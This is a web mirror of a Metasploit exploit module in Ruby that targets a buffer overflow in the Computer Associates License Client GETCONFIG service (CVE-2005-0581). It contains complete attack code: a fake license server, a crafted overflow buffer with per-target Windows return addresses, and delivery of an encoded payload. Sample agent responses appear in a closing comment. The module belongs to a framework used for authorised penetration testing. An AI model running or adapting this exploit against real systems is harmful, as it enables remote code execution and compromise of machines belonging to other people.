CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/license/calicclnt_getconfig.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'Computer Associates License Client GETCONFIG Overflow',13'Description' => %q{14This module exploits a vulnerability in the CA License Client15service. This exploit will only work if your IP address can be16resolved from the target system point of view. This can be17accomplished on a local network by running the 'nmbd' service18that comes with Samba. If you are running this exploit from19Windows and do not filter udp port 137, this should not be a20problem (if the target is on the same network segment). Due to21the bugginess of the software, you are only allowed one connection22to the agent port before it starts ignoring you. If it wasn't for this23issue, it would be possible to repeatedly exploit this bug.24},25'Author' =>26[27'hdm', # original msf v2 module28'aushack', # msf v3 port :)29],30'License' => MSF_LICENSE,31'References' =>32[33[ 'CVE', '2005-0581' ],34[ 'OSVDB', '14389' ],35[ 'BID', '12705' ],36[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],37],38'Privileged' => true,39'DefaultOptions' =>40{41'EXITFUNC' => 'process',42},43'Payload' =>44{45'Space' => 600,46'BadChars' => "\x00\x20",47'StackAdjustment' => -3500,4849},50'Platform' => 'win',51'Targets' =>52[53# As much as I would like to return back to the DLL or EXE,54# all of those modules have a leading NULL in the55# loaded @ address :(56# name, jmp esi, writable, jmp edi57#['Automatic', {} ],58#59# aushack - tested OK Windows XP English SP0-1 only 2010021460['Windows 2000 English', { 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi61['Windows XP English SP0-1', { 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi62['Windows XP English SP2', { 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi63['Windows 2003 English SP0', { 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi64],65'DisclosureDate' => '2005-03-02'))6667register_options(68[69Opt::RPORT(10203),70OptPort.new('SRVPORT', [ true, "Fake CA License Server Port", 10202 ]),71])72end7374#def check75# It is possible to check, but due to a software bug, checking prevents exploitation76#end7778def exploit79if (connect)80sock.put("A0 GETSERVER<EOM>\n")81print_status("Initial packet sent to remote agent...")82disconnect8384fakecaservice = Rex::Socket::TcpServer.create(85'LocalHost' => '0.0.0.0',86'LocalPort' => datastore['SRVPORT'],87'SSL' => false,88'Context' =>89{90'Msf' => framework,91'MsfExploit' => self,92})9394add_socket(fakecaservice)9596fakecaservice.start97print_status("Waiting for the license agent to connect back...")98begin99Timeout.timeout(3) do100done = false101while (not done and session = fakecaservice.accept)102print_status("Accepted connection from agent #{Rex::Socket.source_address(rhost)}..")103session.put("A0 GETCONFIG SELF 0<EOM>")104req = session.recvfrom(2000)[0]105next if not req106next if req.empty?107108if (req =~ /OS\<([^\>]+)/)109print_status("Target reports OS: #{$1}")110end111112# exploits two different versions at once >:-)113# 144 -> return address of esi points to string middle114# 196 -> return address of edi points to string beginning115# 148 -> avoid exception by patching with writable address116# 928 -> seh handler (not useful under XP SP2)117buff = rand_text_alphanumeric(900)118buff[142, 2] = Rex::Arch::X86.jmp_short(8) # jmp over addresses119buff[144, 4] = [target['Rets'][0]].pack('V') # jmp esi120buff[148, 4] = [target['Rets'][1]].pack('V') # writable address121buff[194, 2] = Rex::Arch::X86.jmp_short(4) # jmp over address122buff[196, 4] = [target['Rets'][2]].pack('V') # jmp edi123buff[272, payload.encoded.length] = payload.encoded124125sploit = "A0 GETCONFIG SELF #{buff}<EOM>"126session.put(sploit)127session.close128end129end130ensure131handler132fakecaservice.close133return134end135end136end137end138139=begin140eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>141BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>142lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>143=end144145146